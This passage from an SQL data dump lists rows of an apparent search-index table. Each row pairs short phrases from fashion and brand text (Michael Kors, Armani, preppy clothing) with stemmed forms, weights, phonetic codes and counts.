and',0,1,1.5667,'W2154253',1,'en'),(39020,'wealthy','wealthi',0,0,0.4667,'W430',1,'en'),(39021,'wealthy families','wealthi families',0,1,1.5333,'W431542',1,'en'),(39022,'wealthy families a','wealthi families a',0,1,1.6,'W431542',1,'en'),(39023,'wealthy families and','wealthi families and',0,1,1.6667,'W43154253',1,'en'),(39024,'wear prada','wear prada',0,1,1.3333,'W6163',1,'en'),(39025,'wear prada the','wear prada the',0,1,1.4667,'W6163',1,'en'),(39026,'wear ripped','wear ripped',0,1,1.3667,'W613',1,'en'),(39027,'wear ripped up','wear ripped up',0,1,1.4667,'W6131',1,'en'),(39028,'wearing the','wear the',0,1,1.3667,'W6523',1,'en'),(39029,'wearing the sweater','wear the sweater',0,1,1.6333,'W6523236',1,'en'),(39030,'weight than','weight than',0,1,1.3667,'W235',1,'en'),(39031,'weight than the','weight than the',0,1,1.5,'W2353',1,'en'),(39032,'well as abercrombie','well as abercrombie',0,1,1.6333,'W42162651',1,'en'),(39033,'well i look','well i look',0,1,1.3667,'W420',1,'en'),(39034,'well let','well let',0,1,1.2667,'W430',1,'en'),(39035,'well let me','well let me',0,1,1.3667,'W435',1,'en'),(39036,'well off','well off',0,1,1.2667,'W410',1,'en'),(39037,'well off they','well off they',0,1,1.4333,'W413',1,'en'),(39038,'were people','were people',0,1,1.3667,'W614',1,'en'),(39039,'were people of','were people of',0,1,1.4667,'W6141',1,'en'),(39040,'what is','what is',0,1,1.2333,'W320',1,'en'),(39041,'what is our','what is our',0,1,1.3667,'W326',1,'en'),(39042,'what preppy','what preppy',0,1,1.3667,'W3161',1,'en'),(39043,'what preppy means','what preppy means',0,1,1.5667,'W316152',1,'en'),(39044,'what runway','what runway',0,1,1.3667,'W365',1,'en'),(39045,'what runway trends','what runway trends',0,1,1.6,'W36536532',1,'en'),(39046,'what you don','what you don',0,1,1.4,'W350',1,'en'),(39047,'what you put','what you put',0,1,1.4,'W313',1,'en'),(39048,'when truthfully','when truthfully',0,1,1.5,'W536314',1,'en'),(39049,'when truthfully you','when truthfully you',0,1,1.6333,'W536314',1,'en'),(39050,'where you surely','where you surely',0,1,1.5333,'W6264',1,'en'),(39051,'which may for','which may for',0,1,1.4333,'W2516',1,'en'),(39052,'while ago','while ago',0,1,1.3,'W420',1,'en'),(39053,'while ago gay','while ago gay',0,1,1.4333,'W420',1,'en'),(39054,'who attended','who attended',0,1,1.4,'W353',1,'en'),(39055,'who attended elite','who attended elite',0,1,1.6,'W35343',1,'en'),(39056,'who call','who call',0,1,1.2667,'W240',1,'en'),(39057,'who call in','who call in',0,1,1.3667,'W245',1,'en'),(39058,'who dress','who dress',0,1,1.3,'W362',1,'en'),(39059,'who dress for','who dress for',0,1,1.4333,'W36216',1,'en'),(39060,'who likes','who likes',0,1,1.3,'W420',1,'en'),(39061,'who likes you','who likes you',0,1,1.4333,'W420',1,'en'),(39062,'who showed','who showed',0,1,1.3333,'W230',1,'en'),(39063,'who showed cerulean','who showed cerulean',0,1,1.6333,'W232645',1,'en'),(39064,'why attended','why attended',0,1,1.4,'W353',1,'en'),(39065,'why attended however','why attended however',0,1,1.6667,'W35316',1,'en'),(39066,'will be meant','will be meant',0,1,1.4333,'W4153',1,'en'),(39067,'winery','wineri',0,0,0.4,'W560',1,'en'),(39068,'winery redesign','wineri redesign',0,1,1.5,'W56325',1,'en'),(39069,'winery redesign ralph','wineri redesign ralph',0,1,1.7,'W56325641',1,'en'),(39070,'with prints','with prints',0,1,1.3667,'W316532',1,'en'),(39071,'with prints thanks','with prints thanks',0,1,1.6,'W316532352',1,'en'),(39072,'with so','with so',0,1,1.2333,'W320',1,'en'),(39073,'with so as','with so as',0,1,1.3333,'W320',1,'en'),(39074,'with you','with you',0,1,1.2667,'W300',2,'en'),(39075,'with you you','with you you',0,1,1.4,'W300',1,'en'),(39076,'word and','word and',0,1,1.2667,'W6353',1,'en'),(39077,'word and meanings','word and meanings',0,1,1.5667,'W635352',1,'en'),(39078,'word preppy','word preppy',0,1,1.3667,'W63161',1,'en'),(39079,'word preppy has','word preppy has',0,1,1.5,'W631612',1,'en'),(39080,'worth','worth',0,0,0.3333,'W630',2,'en'),(39081,'worth noting','worth noting',0,1,1.4,'W635352',1,'en'),(39082,'worth noting that','worth noting that',0,1,1.5667,'W6353523',1,'en'),(39083,'y a','y a',0,1,1.1,'Y000',1,'en'),(39084,'y a fabulous','y a fabulous',0,1,1.4,'Y142',1,'en'),(39085,'you also','you also',0,1,1.2667,'Y420',1,'en'),(39086,'you also blithely','you also blithely',0,1,1.5667,'Y421434',1,'en'),(39087,'you been','you been',0,1,1.2667,'Y150',1,'en'),(39088,'you been to','you been to',0,1,1.3667,'Y153',1,'en'),(39089,'you by','you by',0,1,1.2,'Y100',1,'en'),(39090,'you by the','you by the',0,1,1.3333,'Y130',1,'en'),(39091,'you decide','you decide',0,1,1.3333,'Y323',1,'en'),(39092,'you decide on','you decide on',0,1,1.4333,'Y3235',1,'en'),(39093,'you don','you don',0,1,1.2333,'Y350',1,'en'),(39094,'you don know','you don know',0,1,1.4,'Y3525',1,'en'),(39095,'you from','you from',0,1,1.2667,'Y165',1,'en'),(39096,'you from the','you from the',0,1,1.4,'Y1653',1,'en'),(39097,'you go','you go',0,1,1.2,'Y200',1,'en'),(39098,'you go to','you go to',0,1,1.3,'Y230',1,'en'),(39099,'you made','you made',0,1,1.2667,'Y530',1,'en'),(39100,'you made a','you made a',0,1,1.3333,'Y530',1,'en'),(39101,'you put','you put',0,1,1.2333,'Y130',1,'en'),(39102,'you put on','you put on',0,1,1.3333,'Y135',1,'en'),(39103,'you says','you says',0,1,1.2667,'Y200',1,'en'),(39104,'you says who','you says who',0,1,1.4,'Y200',1,'en'),(39105,'you surely','you surely',0,1,1.3333,'Y264',1,'en'),(39106,'you surely fished','you surely fished',0,1,1.5667,'Y264123',1,'en'),(39107,'you take','you take',0,1,1.2667,'Y320',1,'en'),(39108,'you take yourself','you take yourself',0,1,1.5667,'Y326241',1,'en'),(39109,'you teenagers','you teenagers',0,1,1.4333,'Y35262',1,'en'),(39110,'you teenagers who','you teenagers who',0,1,1.5667,'Y35262',1,'en'),(39111,'you that','you that',0,1,1.2667,'Y300',1,'en'),(39112,'you that you','you that you',0,1,1.4,'Y300',1,'en'),(39113,'you think','you think',0,1,1.3,'Y352',2,'en'),(39114,'you think that','you think that',0,1,1.4667,'Y3523',1,'en'),(39115,'you think this','you think this',0,1,1.4667,'Y35232',1,'en'),(39116,'you trend','you trend',0,1,1.3,'Y3653',1,'en'),(39117,'you trend along','you trend along',0,1,1.5,'Y3653452',1,'en'),(39118,'you trying','you trying',0,1,1.3333,'Y3652',1,'en'),(39119,'you trying to','you trying to',0,1,1.4333,'Y36523',1,'en'),(39120,'you wearing','you wearing',0,1,1.3667,'Y652',1,'en'),(39121,'you wearing the','you wearing the',0,1,1.5,'Y6523',1,'en'),(39122,'you you go','you you go',0,1,1.3333,'Y200',1,'en'),(39123,'your back','your back',0,1,1.3,'Y612',1,'en'),(39124,'your back but','your back but',0,1,1.4333,'Y61213',1,'en'),(39125,'your closet','your closet',0,1,1.3667,'Y62423',1,'en'),(39126,'your closet and','your closet and',0,1,1.5,'Y6242353',1,'en'),(39127,'your neck','your neck',0,1,1.3,'Y652',2,'en'),(39128,'your neck and','your neck and',0,1,1.4333,'Y65253',1,'en'),(39129,'your preppy','your preppy',0,1,1.3667,'Y6161',1,'en'),(39130,'your preppy have','your preppy have',0,1,1.5333,'Y6161',1,'en'),(39131,'your right','your right',0,1,1.3333,'Y623',1,'en'),(39132,'your right most','your right most',0,1,1.5,'Y623523',1,'en'),(39133,'yourself too','yourself too',0,1,1.4,'Y62413',1,'en'),(39134,'yourself too seriously','yourself too seriously',0,1,1.7333,'Y624132624',1,'en'),(39135,'youth','youth',0,0,0.3333,'Y300',1,'en'),(39136,'youth arriving','youth arriving',0,1,1.4667,'Y36152',1,'en'),(39137,'youth arriving at','youth arriving at',0,1,1.5667,'Y361523',1,'en'),(39138,'yves','yve',0,0,0.2667,'Y120',1,'en'),(39139,'yves st','yve st',0,1,1.2333,'Y123',1,'en'),(39140,'yves st laurent','yve st laurent',0,1,1.5,'Y1234653',1,'en'),(39141,'50 lap','50 lap',0,1,1.2,'L100',1,'en'),(39142,'50 lap digital','50 lap digital',0,1,1.4667,'L13234',1,'en'),(39143,'91','91',0,0,0.2,'',1,'en'),(39144,'a fashion','a fashion',0,1,1.3,'A125',1,'en'),(39145,'a fashion favorite','a fashion favorite',0,1,1.6,'A125163',1,'en'),(39146,'a fave','a fave',0,1,1.2,'A100',1,'en'),(39147,'a fave of','a fave of',0,1,1.3,'A100',1,'en'),(39148,'a michael','a michael',0,1,1.3,'A524',1,'en'),(39149,'a michael kors','a michael kors',0,1,1.4667,'A524262',1,'en'),(39150,'a single java','a single java',0,1,1.4333,'A252421',1,'en'),(39151,'a trend that','a trend that',0,1,1.4,'A3653',1,'en'),(39152,'about their','about their',0,1,1.3667,'A136',1,'en'),(39153,'about their fashion','about their fashion',0,1,1.6333,'A136125',1,'en'),(39154,'account of','account of',0,1,1.3333,'A2531',1,'en'),(39155,'account of the','account of the',0,1,1.4667,'A25313',1,'en'),(39156,'adult','adult',0,0,0.3333,'A343',1,'en'),(39157,'adult adult','adult adult',0,1,1.3667,'A34343',1,'en'),(39158,'adult adult males','adult adult males',0,1,1.5667,'A34343542',1,'en'),(39159,'adult males','adult males',0,1,1.3667,'A343542',1,'en'),(39160,'adult males fad','adult males fad',0,1,1.5,'A34354213',1,'en'),(39161,'after that this','after that this',0,1,1.5,'A13632',1,'en'),(39162,'alligator','allig',0,0,0.6,'A4236',1,'en'),(39163,'alligator retrograde','allig retrograde',0,1,1.6667,'A423636263',1,'en'),(39164,'alligator retrograde t2m422,.it','allig retrograde t2m422,.it',0,1,2,'A42363626353',1,'en'),(39165,'also you will','also you will',0,1,1.4333,'A424',1,'en'),(39166,'an incredible','an incredible',0,1,1.4333,'A526314',1,'en'),(39167,'an incredible secret','an incredible secret',0,1,1.6667,'A526314263',1,'en'),(39168,'and a fave','and a fave',0,1,1.3333,'A531',1,'en'),(39169,'and demonstrates','and demonstrates',0,1,1.5333,'A53523632',1,'en'),(39170,'and demonstrates that','and demonstrates that',0,1,1.7,'A535236323',1,'en'),(39171,'and embellished','and embellished',0,1,1.5,'A5351423',1,'en'),(39172,'and embellished australia','and embellished australia',0,1,1.8333,'A53514232364',1,'en'),(39173,'and kinds','and kinds',0,1,1.3,'A532532',1,'en'),(39174,'and kinds of','and kinds of',0,1,1.4,'A5325321',1,'en'),(39175,'and presently','and presently',0,1,1.4333,'A53162534',1,'en'),(39176,'and presently lives','and presently lives',0,1,1.6333,'A5316253412',1,'en'),(39177,'and thin','and thin',0,1,1.2667,'A535',1,'en'),(39178,'and thin the','and thin the',0,1,1.4,'A5353',1,'en'),(39179,'and vibrant','and vibrant',0,1,1.3667,'A531653',1,'en'),(39180,'and vibrant iteration','and vibrant iteration',0,1,1.7,'A531653635',1,'en'),(39181,'appeal very','appeal very',0,1,1.3667,'A1416',1,'en'),(39182,'appeal very fast','appeal very fast',0,1,1.5333,'A1416123',1,'en'),(39183,'are and a','ar and a',0,1,1.3,'A653',1,'en'),(39184,'are most','ar most',0,1,1.2667,'A6523',1,'en'),(39185,'are most picked','ar most picked',0,1,1.5,'A6523123',1,'en'),(39186,'are so aware','ar so aware',0,1,1.4,'A626',1,'en'),(39187,'are very','ar very',0,1,1.2667,'A616',1,'en'),(39188,'are very pricey','ar very pricey',0,1,1.5,'A616162',1,'en'),(39189,'area michael','area michael',0,1,1.4,'A6524',1,'en'),(39190,'area michael kors','area michael kors',0,1,1.5667,'A6524262',1,'en'),(39191,'armani code away','armani code away',0,1,1.5333,'A6523',1,'en'),(39192,'armani diesel\'s','armani diesel',0,1,1.5,'A653242',1,'en'),(39193,'armani diesel\'s fragrance','armani diesel fragrance',0,1,1.8333,'A653242162652',1,'en'),(39194,'armani mens','armani mens',0,1,1.3667,'A652',1,'en'),(39195,'armani mens watch','armani mens watch',0,1,1.5667,'A65232',1,'en'),(39196,'articles','articl',0,0,0.5333,'A63242',3,'en'),(39197,'articles armani','articl armani',0,1,1.5,'A6324265',1,'en'),(39198,'articles armani mens','articl armani mens',0,1,1.6667,'A63242652',1,'en'),(39199,'articles because','articl because',0,1,1.5333,'A6324212',1,'en'),(39200,'articles because the','articl because the',0,1,1.6667,'A63242123',1,'en'),(39201,'as a fashion','as a fashion',0,1,1.4,'A2125',1,'en'),(39202,'aspects','aspect',0,0,0.4667,'A21232',1,'en'),(39203,'aspects no','aspect no',0,1,1.3333,'A212325',1,'en'),(39204,'aspects no marvel','aspect no marvel',0,1,1.5667,'A212325614',1,'en'),(39205,'australia has','australia has',0,1,1.4333,'A23642',1,'en'),(39206,'australia has lots','australia has lots',0,1,1.6,'A23642432',1,'en'),(39207,'aware','awar',0,0,0.3333,'A600',1,'en'),(39208,'aware about','awar about',0,1,1.3667,'A613',1,'en'),(39209,'aware about their','awar about their',0,1,1.5667,'A6136',1,'en'),(39210,'away due','awai due',0,1,1.2667,'A300',1,'en'),(39211,'away due to','awai due to',0,1,1.3667,'A300',1,'en'),(39212,'bag brand','bag brand',0,1,1.3,'B21653',1,'en'),(39213,'bag brand has','bag brand has',0,1,1.4333,'B216532',1,'en'),(39214,'because the cost','becaus the cost',0,1,1.5333,'B2323',1,'en'),(39215,'benetton','benetton',0,0,0.5333,'B535',1,'en'),(39216,'benetton forget','benetton forget',0,1,1.5,'B5351623',1,'en'),(39217,'benetton forget sixty\'s','benetton forget sixty',0,1,1.7667,'B5351623232',1,'en'),(39218,'best watches','best watches',0,1,1.4,'B232',1,'en'),(39219,'best watches produced','best watches produced',0,1,1.7,'B23216323',1,'en'),(39220,'birth','birth',0,0,0.3333,'B630',1,'en'),(39221,'birth to','birth to',0,1,1.2667,'B630',1,'en'),(39222,'birth to the','birth to the',0,1,1.4,'B630',1,'en'),(39223,'black strap','black strap',0,1,1.3667,'B42361',1,'en'),(39224,'black strap t2m552','black strap t2m552',0,1,1.6,'B4236135',1,'en'),(39225,'bracelets canada account','bracelet canada account',0,1,1.8,'B6243253253',1,'en'),(39226,'brand has','brand has',0,1,1.3,'B6532',1,'en'),(39227,'brand has risen','brand has risen',0,1,1.5,'B6532625',1,'en'),(39228,'brand names','brand names',0,1,1.3667,'B65352',1,'en'),(39229,'brand names shapes','brand names shapes',0,1,1.6,'B6535212',1,'en'),(39230,'but also','but also',0,1,1.2667,'B342',1,'en'),(39231,'but also you','but also you',0,1,1.4,'B342',1,'en'),(39232,'by recognized','by recognized',0,1,1.4333,'B62523',1,'en'),(39233,'by recognized manufacturers','by recognized manufacturers',0,1,1.9,'B62523512362',1,'en'),(39234,'calvin','calvin',0,0,0.4,'C415',1,'en'),(39235,'calvin klein','calvin klein',0,1,1.4,'C415245',1,'en'),(39236,'calvin klein armani','calvin klein armani',0,1,1.6333,'C41524565',1,'en'),(39237,'canada account','canada account',0,1,1.4667,'C53253',1,'en'),(39238,'canada account of','canada account of',0,1,1.5667,'C532531',1,'en'),(39239,'canada area','canada area',0,1,1.3667,'C536',1,'en'),(39240,'canada area michael','canada area michael',0,1,1.6333,'C536524',1,'en'),(39241,'charms canada area','charm canada area',0,1,1.6,'C652536',1,'en'),(39242,'code away','code away',0,1,1.3,'C300',1,'en'),(39243,'code away due','code away due',0,1,1.4333,'C300',1,'en'),(39244,'combination','combin',0,0,0.7333,'C51535',1,'en'),(39245,'combination of','combin of',0,1,1.4667,'C515351',1,'en'),(39246,'combination of racing','combin of racing',0,1,1.7,'C5153516252',1,'en'),(39247,'company if','compani if',0,1,1.3333,'C5151',1,'en'),(39248,'company if you','compani if you',0,1,1.4667,'C5151',1,'en'),(39249,'complement','complement',0,0,0.6667,'C51453',1,'en'),(39250,'complement your','complement your',0,1,1.5,'C514536',1,'en'),(39251,'complement your outfit','complement your outfit',0,1,1.7333,'C514536313',1,'en'),(39252,'constantly new','constantli new',0,1,1.4667,'C5235345',1,'en'),(39253,'constantly new things','constantli new things',0,1,1.7,'C5235345352',1,'en'),(39254,'cost of purchasing','cost of purchasing',0,1,1.6,'C316252',1,'en'),(39255,'could perhaps','could perhaps',0,1,1.4333,'C431612',1,'en'),(39256,'could perhaps not','could perhaps not',0,1,1.5667,'C43161253',1,'en'),(39257,'daring','dare',0,0,0.4,'D652',1,'en'),(39258,'daring and','dare and',0,1,1.3333,'D65253',1,'en'),(39259,'daring and vibrant','dare and vibrant',0,1,1.6,'D652531653',1,'en'),(39260,'dealers','dealer',0,0,0.4667,'D462',1,'en'),(39261,'dealers who','dealer who',0,1,1.3667,'D462',1,'en'),(39262,'dealers who supply','dealer who supply',0,1,1.6,'D46214',1,'en'),(39263,'deals an','deal an',0,1,1.2667,'D425',1,'en'),(39264,'deals an incredible','deal an incredible',0,1,1.6333,'D42526314',1,'en'),(39265,'demonstrates','demonstr',0,0,0.8,'D523632',1,'en'),(39266,'demonstrates that','demonstr that',0,1,1.5667,'D5236323',1,'en'),(39267,'demonstrates that there','demonstr that there',0,1,1.7667,'D52363236',1,'en'),(39268,'diesel\'s','diesel',0,0,0.5333,'D242',1,'en'),(39269,'diesel\'s fragrance','diesel fragrance',0,1,1.6,'D242162652',1,'en'),(39270,'diesel\'s fragrance fuel','diesel fragrance fuel',0,1,1.7667,'D24216265214',1,'en'),(39271,'digital watch','digit watch',0,1,1.4333,'D23432',1,'en'),(39272,'digital watch t5j641','digit watch t5j641',0,1,1.6667,'D2343232',1,'en'),(39273,'distinct','distinct',0,0,0.5333,'D23523',1,'en'),(39274,'distinct brand','distinct brand',0,1,1.4667,'D235231653',1,'en'),(39275,'distinct brand names','distinct brand names',0,1,1.6667,'D23523165352',1,'en'),(39276,'dkny','dkny',0,0,0.2667,'D250',1,'en'),(39277,'dkny wonderful','dkny wonderful',0,1,1.4667,'D253614',1,'en'),(39278,'dkny wonderful night','dkny wonderful night',0,1,1.6667,'D253614523',1,'en'),(39279,'do not intend','do not intend',0,1,1.4333,'D535353',1,'en'),(39280,'donna','donna',0,0,0.3333,'D500',1,'en'),(39281,'donna karan\'s','donna karan',0,1,1.4333,'D52652',1,'en'),(39282,'donna karan\'s dkny','donna karan dkny',0,1,1.6,'D52652325',1,'en'),(39283,'due to giorgio','due to giorgio',0,1,1.4667,'D262',1,'en'),(39284,'embellished','embellish',0,0,0.7333,'E51423',1,'en'),(39285,'embellished australia','embellish australia',0,1,1.7,'E514232364',1,'en'),(39286,'embellished australia has','embellish australia has',0,1,1.8333,'E5142323642',1,'en'),(39287,'espirit','espirit',0,0,0.4667,'E2163',1,'en'),(39288,'espirit with','espirit with',0,1,1.4,'E2163',1,'en'),(39289,'espirit with joy','espirit with joy',0,1,1.5333,'E21632',1,'en'),(39290,'estee','este',0,0,0.3333,'E230',1,'en'),(39291,'estee lauder\'s','este lauder',0,1,1.4667,'E234362',1,'en'),(39292,'estee lauder\'s parfum','este lauder parfum',0,1,1.7,'E2343621615',1,'en'),(39293,'every lady\'s','everi lady',0,1,1.4,'E16432',1,'en'),(39294,'every lady\'s list','everi lady list',0,1,1.5667,'E16432423',1,'en'),(39295,'exc','exc',0,0,0.2,'E200',1,'en'),(39296,'exotic the','exot the',0,1,1.3333,'E2323',1,'en'),(39297,'exotic the top','exot the top',0,1,1.4667,'E23231',1,'en'),(39298,'facet','facet',0,0,0.3333,'F230',1,'en'),(39299,'facet of','facet of',0,1,1.2667,'F231',1,'en'),(39300,'facet of this','facet of this',0,1,1.4333,'F23132',1,'en'),(39301,'fad','fad',0,0,0.2,'F300',1,'en'),(39302,'fad that','fad that',0,1,1.2667,'F300',1,'en'),(39303,'fad that has','fad that has',0,1,1.4,'F320',1,'en'),(39304,'fashion company','fashion company',0,1,1.5,'F252515',1,'en'),(39305,'fashion company if','fashion company if',0,1,1.6,'F2525151',1,'en'),(39306,'fashion favorite','fashion favorite',0,1,1.5333,'F25163',1,'en'),(39307,'fashion favorite skinny','fashion favorite skinny',0,1,1.7667,'F2516325',1,'en'),(39308,'fashion that','fashion that',0,1,1.4,'F253',1,'en'),(39309,'fashion that they','fashion that they',0,1,1.5667,'F253',1,'en'),(39310,'fast throughout','fast throughout',0,1,1.5,'F23623',1,'en'),(39311,'fast throughout the','fast throughout the',0,1,1.6333,'F23623',1,'en'),(39312,'fave','fave',0,0,0.2667,'F000',1,'en'),(39313,'fave of','fave of',0,1,1.2333,'F000',1,'en'),(39314,'fave of mine','fave of mine',0,1,1.4,'F500',1,'en'),(39315,'favorite skinny','favorit skinny',0,1,1.5,'F6325',1,'en'),(39316,'favorite skinny organizations','favorit skinny organizations',0,1,1.9667,'F63256252352',1,'en'),(39317,'fixation','fixat',0,0,0.5333,'F235',1,'en'),(39318,'fixation from','fixat from',0,1,1.4333,'F235165',1,'en'),(39319,'fixation from calvin','fixat from calvin',0,1,1.6667,'F2351652415',1,'en'),(39320,'flamboyant','flamboy',0,0,0.6667,'F45153',1,'en'),(39321,'flamboyant facet','flamboy facet',0,1,1.5333,'F45153123',1,'en'),(39322,'flamboyant facet of','flamboy facet of',0,1,1.6333,'F451531231',1,'en'),(39323,'for distinct','for distinct',0,1,1.4,'F6323523',1,'en'),(39324,'for distinct brand','for distinct brand',0,1,1.6,'F63235231653',1,'en'),(39325,'for life infinite','for life infinite',0,1,1.5667,'F6415153',1,'en'),(39326,'for men include','for men include',0,1,1.5,'F65243',1,'en'),(39327,'forget','forget',0,0,0.4,'F623',2,'en'),(39328,'forget sixty\'s','forget sixty',0,1,1.4667,'F623232',1,'en'),(39329,'forget sixty\'s skip','forget sixty skip',0,1,1.6333,'F6232321',1,'en'),(39330,'forward','forward',0,0,0.4667,'F630',1,'en'),(39331,'forward to','forward to',0,1,1.3333,'F630',1,'en'),(39332,'forward to there','forward to there',0,1,1.5333,'F636',1,'en'),(39333,'fragrance','fragranc',0,0,0.6,'F62652',1,'en'),(39334,'fragrance fuel','fragranc fuel',0,1,1.4667,'F6265214',1,'en'),(39335,'fragrance fuel for','fragranc fuel for',0,1,1.6,'F626521416',1,'en'),(39336,'from calvin','from calvin',0,1,1.3667,'F652415',1,'en'),(39337,'from calvin klein','from calvin klein',0,1,1.5667,'F652415245',1,'en'),(39338,'fuel','fuel',0,0,0.2667,'F400',2,'en'),(39339,'fuel for','fuel for',0,1,1.2667,'F416',1,'en'),(39340,'fuel for life','fuel for life',0,1,1.4333,'F41641',1,'en'),(39341,'gents','gent',0,0,0.3333,'G532',1,'en'),(39342,'gents alligator','gent alligator',0,1,1.5,'G5324236',1,'en'),(39343,'gents alligator retrograde','gent alligator retrograde',0,1,1.8667,'G532423636263',1,'en'),(39344,'get to see','get to see',0,1,1.3333,'G320',1,'en'),(39345,'giorgio','giorgio',0,0,0.4667,'G620',1,'en'),(39346,'giorgio armani','giorgio armani',0,1,1.4667,'G6265',1,'en'),(39347,'giorgio armani diesel\'s','giorgio armani diesel',0,1,1.7667,'G62653242',1,'en'),(39348,'go for','go for',0,1,1.2,'G160',1,'en'),(39349,'go for distinct','go for distinct',0,1,1.5,'G16323523',1,'en'),(39350,'goes to','goe to',0,1,1.2333,'G300',1,'en'),(39351,'goes to optimum','goe to optimum',0,1,1.5,'G3135',1,'en'),(39352,'google deals','googl deals',0,1,1.4,'G4342',1,'en'),(39353,'google deals an','googl deals an',0,1,1.5,'G43425',1,'en'),(39354,'has actually','ha actually',0,1,1.4,'H234',1,'en'),(39355,'has lots','ha lots',0,1,1.2667,'H2432',1,'en'),(39356,'has lots of','ha lots of',0,1,1.3667,'H24321',1,'en'),(39357,'has provided','ha provided',0,1,1.4,'H21613',1,'en'),(39358,'has provided birth','ha provided birth',0,1,1.6,'H21613163',1,'en'),(39359,'has risen','ha risen',0,1,1.3,'H2625',1,'en'),(39360,'has risen in','ha risen in',0,1,1.4,'H2625',1,'en'),(39361,'high sunglasses','high sunglasses',0,1,1.5,'H25242',1,'en'),(39362,'high sunglasses are','high sunglasses are',0,1,1.6333,'H252426',1,'en'),(39363,'if you do','if you do',0,1,1.3,'I130',1,'en'),(39364,'in appeal','in appeal',0,1,1.3,'I514',1,'en'),(39365,'in appeal very','in appeal very',0,1,1.4667,'I51416',1,'en'),(39366,'in the matter','in the matter',0,1,1.4333,'I53536',1,'en'),(39367,'include the','includ the',0,1,1.3667,'I5243',1,'en'),(39368,'include the ironman','includ the ironman',0,1,1.6333,'I524365',1,'en'),(39369,'incredible','incred',0,0,0.6667,'I526314',1,'en'),(39370,'incredible secret','incred secret',0,1,1.5667,'I526314263',1,'en'),(39371,'incredible secret fixation','incred secret fixation',0,1,1.8667,'I5263142631235',1,'en'),(39372,'infinite','infinit',0,0,0.5333,'I5153',1,'en'),(39373,'infinite benetton','infinit benetton',0,1,1.5667,'I51531535',1,'en'),(39374,'infinite benetton forget','infinit benetton forget',0,1,1.8,'I515315351623',1,'en'),(39375,'intend','intend',0,0,0.4,'I5353',2,'en'),(39376,'intend to','intend to',0,1,1.3,'I5353',2,'en'),(39377,'intend to spent','intend to spent',0,1,1.5,'I53532153',1,'en'),(39378,'ironman','ironman',0,0,0.4667,'I650',1,'en'),(39379,'ironman shock','ironman shock',0,1,1.4333,'I652',1,'en'),(39380,'ironman shock solar','ironman shock solar',0,1,1.6333,'I65246',1,'en'),(39381,'is a united','is a united',0,1,1.3667,'I253',1,'en'),(39382,'is constantly','is constantly',0,1,1.4333,'I2523534',1,'en'),(39383,'is constantly new','is constantly new',0,1,1.5667,'I25235345',1,'en'),(39384,'is the exc','is the exc',0,1,1.3333,'I232',1,'en'),(39385,'it represents','it represents',0,1,1.4333,'I36162532',1,'en'),(39386,'it represents the','it represents the',0,1,1.5667,'I361625323',1,'en'),(39387,'iteration','iter',0,0,0.6,'I3635',1,'en'),(39388,'iteration of','iter of',0,1,1.4,'I36351',1,'en'),(39389,'iteration of michael','iter of michael',0,1,1.6667,'I36351524',1,'en'),(39390,'jam','jam',0,0,0.2,'J500',1,'en'),(39391,'jam kw','jam kw',0,1,1.2,'J520',1,'en'),(39392,'jam kw a','jam kw a',0,1,1.2667,'J520',1,'en'),(39393,'java','java',0,0,0.2667,'J100',1,'en'),(39394,'java want','java want',0,1,1.3,'J153',1,'en'),(39395,'java want a','java want a',0,1,1.3667,'J153',1,'en'),(39396,'joy estee','joi estee',0,1,1.3,'J300',1,'en'),(39397,'joy estee lauder\'s','joi estee lauder',0,1,1.6,'J34362',1,'en'),(39398,'karan\'s','karan',0,0,0.4667,'K652',1,'en'),(39399,'karan\'s dkny','karan dkny',0,1,1.4,'K652325',1,'en'),(39400,'karan\'s dkny wonderful','karan dkny wonderful',0,1,1.7333,'K6523253614',1,'en'),(39401,'kinds','kind',0,0,0.3333,'K532',1,'en'),(39402,'kinds of','kind of',0,1,1.2667,'K5321',1,'en'),(39403,'kinds of vogue','kind of vogue',0,1,1.4667,'K53212',1,'en'),(39404,'klein','klein',0,0,0.3333,'K450',1,'en'),(39405,'klein armani','klein armani',0,1,1.4,'K4565',1,'en'),(39406,'klein armani code','klein armani code',0,1,1.5667,'K456523',1,'en'),(39407,'kors','kor',0,0,0.2667,'K620',1,'en'),(39408,'kors bag','kor bag',0,1,1.2667,'K6212',1,'en'),(39409,'kors bag brand','kor bag brand',0,1,1.4667,'K62121653',1,'en'),(39410,'kors goes','kor goes',0,1,1.3,'K620',1,'en'),(39411,'kors goes to','kor goes to',0,1,1.4,'K623',1,'en'),(39412,'kors is','kor is',0,1,1.2333,'K620',1,'en'),(39413,'kors is a','kor is a',0,1,1.3,'K620',1,'en'),(39414,'kors line','kor line',0,1,1.3,'K6245',1,'en'),(39415,'kors line aspects','kor line aspects',0,1,1.5667,'K624521232',1,'en'),(39416,'kors watches','kor watches',0,1,1.4,'K6232',1,'en'),(39417,'kors watches that','kor watches that',0,1,1.5667,'K62323',1,'en'),(39418,'kw','kw',0,0,0.1333,'K000',1,'en'),(39419,'kw a','kw a',0,1,1.1333,'K000',1,'en'),(39420,'kw a single','kw a single',0,1,1.3667,'K524',1,'en'),(39421,'lady\'s','ladi',0,0,0.4,'L320',1,'en'),(39422,'lady\'s list','ladi list',0,1,1.3667,'L32423',1,'en'),(39423,'lady\'s list as','ladi list as',0,1,1.4667,'L324232',1,'en'),(39424,'lap','lap',0,0,0.2,'L100',1,'en'),(39425,'lap digital','lap digital',0,1,1.3667,'L13234',1,'en'),(39426,'lap digital watch','lap digital watch',0,1,1.5667,'L1323432',1,'en'),(39427,'last after','last after',0,1,1.3333,'L23136',1,'en'),(39428,'last after that','last after that',0,1,1.5,'L231363',1,'en'),(39429,'last twelve','last twelve',0,1,1.3667,'L2341',1,'en'),(39430,'last twelve month','last twelve month',0,1,1.5667,'L234153',1,'en'),(39431,'lauder\'s','lauder',0,0,0.5333,'L362',1,'en'),(39432,'lauder\'s parfum','lauder parfum',0,1,1.5,'L3621615',1,'en'),(39433,'lauder\'s parfum purely','lauder parfum purely',0,1,1.7333,'L3621615164',1,'en'),(39434,'leading and','lead and',0,1,1.3667,'L35253',1,'en'),(39435,'leading and thin','lead and thin',0,1,1.5333,'L352535',1,'en'),(39436,'life infinite','life infinite',0,1,1.4333,'L15153',1,'en'),(39437,'life infinite benetton','life infinite benetton',0,1,1.7333,'L151531535',1,'en'),(39438,'line and','line and',0,1,1.2667,'L530',1,'en'),(39439,'line and demonstrates','line and demonstrates',0,1,1.7,'L53523632',1,'en'),(39440,'line aspects','line aspects',0,1,1.4,'L521232',1,'en'),(39441,'line aspects no','line aspects no',0,1,1.5,'L5212325',1,'en'),(39442,'list as','list as',0,1,1.2333,'L232',1,'en'),(39443,'list as a','list as 